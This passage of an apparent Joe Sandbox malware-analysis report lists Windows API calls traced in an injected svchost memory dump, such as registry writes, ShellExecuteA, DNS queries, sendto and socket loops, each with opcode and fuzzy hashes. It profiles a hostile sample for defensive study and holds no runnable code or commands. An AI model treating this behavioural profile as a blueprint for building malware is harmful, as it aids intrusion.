                                                                                                                                                                                  • Part of subcall function 131453CC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,1315CE60,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAddBackslashA.KERNELBASE(1315CE60), ref: 131453F7
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAppendA.SHLWAPI(1315CE60,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 1314AC94
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1314ACA7
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314ACC3
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,-00000004,00000071,00000000,000F003F,?), ref: 1314ACEA
                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,-00000004,00000070,00000000,00000001,?,00000104), ref: 1314AD26
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 1314AD2F
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1314AD3A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PathSleep$AppendBackslashCloseEnvironmentOpenValueVariablelstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3351196999-0
                                                                                                                                                                                • Opcode ID: 4fe2e70fd3ef2641633fd1c8d446a576e648f97e0ad43ca10d89397cd0296cbb
                                                                                                                                                                                • Instruction ID: a34f9d23611f9d677bd6044601ea1e3f523b2ceb4555f11e2428dda48e926ab4
                                                                                                                                                                                • Opcode Fuzzy Hash: 4fe2e70fd3ef2641633fd1c8d446a576e648f97e0ad43ca10d89397cd0296cbb
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C113075A40219FFFB05ABE5CD45FEE777CAB04708F100020E605B6095E7B46A44DB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A50
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A6B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-629428536
                                                                                                                                                                                • Opcode ID: d3e6ce9aa681a1f1d64aa8754bc4b29a2fa9782f9ebf582eeb7384410117f2df
                                                                                                                                                                                • Instruction ID: 51f9909ef42d79873867bfb9de5710e1842ae3eaa590c20a3a01065d34695617
                                                                                                                                                                                • Opcode Fuzzy Hash: d3e6ce9aa681a1f1d64aa8754bc4b29a2fa9782f9ebf582eeb7384410117f2df
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF0B436A016329FD726AB34CD849EA3FE49F0765470E9430F835D2568DB34CC038AB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13152A15,00000000,13154BB5,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529AD
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529C4
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D9
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 131529F4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-3682587211
                                                                                                                                                                                • Opcode ID: fd7ebc49492c195ac40f35a3bcc415d9885276f82af5efdcc6ad24769fc2db4a
                                                                                                                                                                                • Instruction ID: ee033adfa20d7b5162f0d990e6246f8c85a8aadc165d10402fe02678524f2fd1
                                                                                                                                                                                • Opcode Fuzzy Hash: fd7ebc49492c195ac40f35a3bcc415d9885276f82af5efdcc6ad24769fc2db4a
                                                                                                                                                                                • Instruction Fuzzy Hash: A5F0B436A016739FD71AAB34CD44AEA3FE49F0265570A5135F834D2264DB34D843DBB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction ID: 6fdbef346fd8525ead6d0797cac569ecc0bda0291445e6b593981b95549a5816
                                                                                                                                                                                • Opcode Fuzzy Hash: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction Fuzzy Hash: 21A171B1D00259AFEB01CBA4CD40BEEBFF9AF05244F384065ED51E7141E7769A45CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1E5,13141440,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE3A
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1E5,-00000004,0000008B,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE5F
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 1314DEC5
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314DECB
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314DEFB
                                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,-00000004,0000008E,?,00000000,00000000), ref: 1314DF31
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,1315CE60,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountCriticalDirectoryEnterExecuteSectionShellSystemTicklstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 995194965-0
                                                                                                                                                                                • Opcode ID: d61a759d89a3b4b0c9b4c207f298292ffb13940e9cf1be3464447091ad592608
                                                                                                                                                                                • Instruction ID: 13c1b9369066cdb6e4ed58d56a630e59443e24633ad642c3ed1b1b0e48a6ab49
                                                                                                                                                                                • Opcode Fuzzy Hash: d61a759d89a3b4b0c9b4c207f298292ffb13940e9cf1be3464447091ad592608
                                                                                                                                                                                • Instruction Fuzzy Hash: 587116B6A00354BFDF10DFA8CD9099E77B9EB42304F694079F445A7281DB74AA81CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,00000000,?,131475E5), ref: 1314F508
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction ID: 162bc25bd3c12c6731c916bea97d04466642709afc5277724cef78296615d18d
                                                                                                                                                                                • Opcode Fuzzy Hash: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1541247AE40305ABCF069FBCC8845AEB7B5EF48241F39403DE541A7340DF35AA658BA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314D065
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,1315CE60,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314D09E
                                                                                                                                                                                • DnsQuery_A.DNSAPI(?,0000000C,00000028,00000000,?,00000000), ref: 1314D0B1
                                                                                                                                                                                • StrStrIA.SHLWAPI(?,-00000004,000000BD,0000000C,00000028,00000000,?,00000000), ref: 1314D0D6
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314D13E
                                                                                                                                                                                • GetLastError.KERNEL32(0000000C,00000028,00000000,?,00000000), ref: 1314D16B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf$ErrorFreeLastListQuery_Recordlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3873175859-0
                                                                                                                                                                                • Opcode ID: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction ID: f6f7a0baabf7a0b2a30316a458c1fa14539f85eb32859fab4e0cd8c58dc0cc47
                                                                                                                                                                                • Opcode Fuzzy Hash: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F4118B16402596FEB26ABA8CC91BE63BDCEB15304FA80026FD60D2193D368D544DB31
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(-00000004,000000F5,00000000,00000000,00000004,00000001), ref: 13146E18
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,-00000004), ref: 13146E37
                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 13146E4D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 13146E5E
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 13146E88
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 13146EAD
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,1315CE60,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryTimewnsprintf$AddressFileFreeLoadProcSystemlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2555659749-0
                                                                                                                                                                                • Opcode ID: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction ID: dabd049f6be1e818442d4598eb3b7bb778e403c5688bf6bd21f820f2eb6281ed
                                                                                                                                                                                • Opcode Fuzzy Hash: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction Fuzzy Hash: 43215872D00229FBDF01EFA4CC859EE7B7CEF09B28F248465F905A2144E7719A51DBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenFile.KERNEL32 ref: 13144B7A
                                                                                                                                                                                • OpenFile.KERNEL32 ref: 13144B92
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 13144B96
                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 13144BA2
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,1314DF11,1314E1E5,00000000), ref: 13144BB4
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 13144BBB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Open$CloseErrorHandleLastPointerWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166246964-0
                                                                                                                                                                                • Opcode ID: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction ID: 15d8d02e8b926ec5a79a478293255d2b80f32c80bb54f5d0f4a4ab43e7174df0
                                                                                                                                                                                • Opcode Fuzzy Hash: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction Fuzzy Hash: 97F04F32601168BBDB246B66DC88DEF3FBDEB89664F008125FA09D3084DB748945DFB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(inetcomm.dll,00000000,00000000,00000067,?,?,?,?,?,?,?,?,?,1314DA6C,00000000), ref: 13146CE5
                                                                                                                                                                                • LoadLibraryA.KERNEL32(inetcomm.dll,?,?,?,?,?,?,?,?,?,1314DA6C,00000000), ref: 13146CF0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                • String ID: MimeOleGenerateMID$inetcomm.dll
                                                                                                                                                                                • API String ID: 4133054770-2511522974
                                                                                                                                                                                • Opcode ID: a4cf49e35a7a388d05d28bf54292f99f3453a17003bf44509ed285f636672002
                                                                                                                                                                                • Instruction ID: 89981d3dc23ffecf24b0d677873d8da3042bc58058477250c88c3045d2683477
                                                                                                                                                                                • Opcode Fuzzy Hash: a4cf49e35a7a388d05d28bf54292f99f3453a17003bf44509ed285f636672002
                                                                                                                                                                                • Instruction Fuzzy Hash: 25F0E571344312EBC3015B79AC48B8FB66CDFD59BEF254838F040F1104E72484415272
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction ID: 1bbd2eee5b8113a3cdaab39bed80c58b06cccd8305aefa2e4b8140a6d9484044
                                                                                                                                                                                • Opcode Fuzzy Hash: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CB190B5A00306EFDB14CFA8CC91E6ABBB9FF58304F204569E956EB691D730E911CB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcmpA.KERNEL32(1314DA4B,-00000004,00000042,-00000004,0000007A,00000000,1314E1E1,00000000,1314E1E5), ref: 1314D366
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1534048567-0
                                                                                                                                                                                • Opcode ID: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction ID: b0c3233bf479d5e0ebebb69b3d0348cd5b8a8a69b5386fb8f37b81496b7ae10e
                                                                                                                                                                                • Opcode Fuzzy Hash: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E61CFB5A00319ABDF119BA8CC81DAE7779EF81758F680425F505E7641EB38E981CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463A5
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463BF
                                                                                                                                                                                • sendto.WS2_32(?,00000374,00000000,13161584,00000010), ref: 131463E7
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 131463F1
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13146403
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$ExitProcessSleepsendto
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1614787347-0
                                                                                                                                                                                • Opcode ID: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction ID: 0fed5bbe40d5aac35426d1477084d13cd0d3141a98e6475887066ccef82ed279
                                                                                                                                                                                • Opcode Fuzzy Hash: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction Fuzzy Hash: EF21F5F2900358AFDB21EFE48DC0E9A732CAB05758F150974F61A67185E370BE48CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000008,00000001,00000018,00000000,131511EA,00000008,?,1314DF65,76B7EA30,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EADE
                                                                                                                                                                                • WSASetLastError.WS2_32(00000000,?,1314DF65,76B7EA30,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAEF
                                                                                                                                                                                • shutdown.WS2_32(00000000,00000002), ref: 1314EAFA
                                                                                                                                                                                • WSAGetLastError.WS2_32(00000000,00000002,00000000,?,1314DF65,76B7EA30,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAFF
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314EB08
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$Readclosesocketshutdown
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4241232737-0
                                                                                                                                                                                • Opcode ID: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction ID: 5c2a29b6aafa48c1bec0fafc417d801875d82609c2feba32a33d38c33df996b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF04F35600240ABDB225F5EDC88D4A77A9EFC2B00B280538F4C5AB214EB216880CB71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(00007530,76B7EA30,00000000,00000000), ref: 1314D8A6
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                  • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505E9,?,00000000,00000000), ref: 13144C32
                                                                                                                                                                                  • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C46
                                                                                                                                                                                  • Part of subcall function 13144C1F: HeapFree.KERNEL32(00000000,00000000), ref: 13144C5B
                                                                                                                                                                                • lstrlenA.KERNEL32(1314E1F2,?,?,?,?,?,00000000), ref: 1314D635
                                                                                                                                                                                • inet_ntoa.WS2_32(00000000), ref: 1314D720
                                                                                                                                                                                • wsprintfA.USER32 ref: 1314D746
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$CriticalEnterFreeHeapSectionSleepinet_ntoalstrlenwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3707610853-0
                                                                                                                                                                                • Opcode ID: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction ID: c0d9678a5d6312c914dfe4a6ca5129e439d50c2ac836d23cb03dc97d3158bba4
                                                                                                                                                                                • Opcode Fuzzy Hash: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1E8B5A00265AFDB08EF68C9D0C6577F9FB4524C7688438E906D7316EB34E985CF60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 1314CD07
                                                                                                                                                                                  • Part of subcall function 13144D0B: _memset.LIBCMT ref: 13144D29
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                  • Part of subcall function 131518CB: EnterCriticalSection.KERNEL32(00000008,13161EF0,00000000,00000000,00000000,?,1314CD55,?,13161EF0,131616E8), ref: 131518DE
                                                                                                                                                                                  • Part of subcall function 131518CB: LeaveCriticalSection.KERNEL32(00000008,?,1314CD55,?), ref: 131518EB
                                                                                                                                                                                  • Part of subcall function 13144EB3: LeaveCriticalSection.KERNEL32(00000000,1314E30B,?,00000000,00000000,-00000004), ref: 13144EBE
                                                                                                                                                                                • select.WS2_32(00000000,13161EF0,00000000,131616E8,?), ref: 1314CDB0
                                                                                                                                                                                • __WSAFDIsSet.WS2_32(?,13161EF0), ref: 1314CE0D
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$CountSleepTick_memsetselect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 462285117-0
                                                                                                                                                                                • Opcode ID: bc6f7c878f98143a391d096ed0f0a874d9c00021e8d9e1d7048eb94279f4efec
                                                                                                                                                                                • Instruction ID: 804a398415ae26fc5b7eb0287963a1101ec9206849f780cd4644be78a764b607
                                                                                                                                                                                • Opcode Fuzzy Hash: bc6f7c878f98143a391d096ed0f0a874d9c00021e8d9e1d7048eb94279f4efec
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C819D79800316FFDF11DFA8D98099EBBF9FF05314B25053AE511B3290DB38AA518BA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,1315CE60,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13144927
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,13144384,?,00000000,00000000), ref: 13144AA2
                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 13144AF6
                                                                                                                                                                                • Sleep.KERNEL32(00000032,?,?,?), ref: 13144B15
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep$CreateExitProcessThreadlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409902211-0
                                                                                                                                                                                • Opcode ID: 4e1b458664478aaba1b24a3ae8c310bc572eaf0a673310bd624501591e4524a4
                                                                                                                                                                                • Instruction ID: d88f6d14892378904b0dc470ab3adc977061ca48c0c3b786eb947c20e0c2d408
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e1b458664478aaba1b24a3ae8c310bc572eaf0a673310bd624501591e4524a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D710476A80350EFDB25EF59C9C5E5A7BF8EB86755F34002AE501F7244EB38A540CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersion.KERNEL32(00020000,76B5EEA0,00000000), ref: 1314302C
                                                                                                                                                                                • GetCommandLineA.KERNEL32(00000000,0000004A,00000000,0000003C), ref: 13143086
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,00000000,0000007B), ref: 131430A7
                                                                                                                                                                                • inet_addr.WS2_32(00000000), ref: 131430D2
                                                                                                                                                                                Memory Dump Source
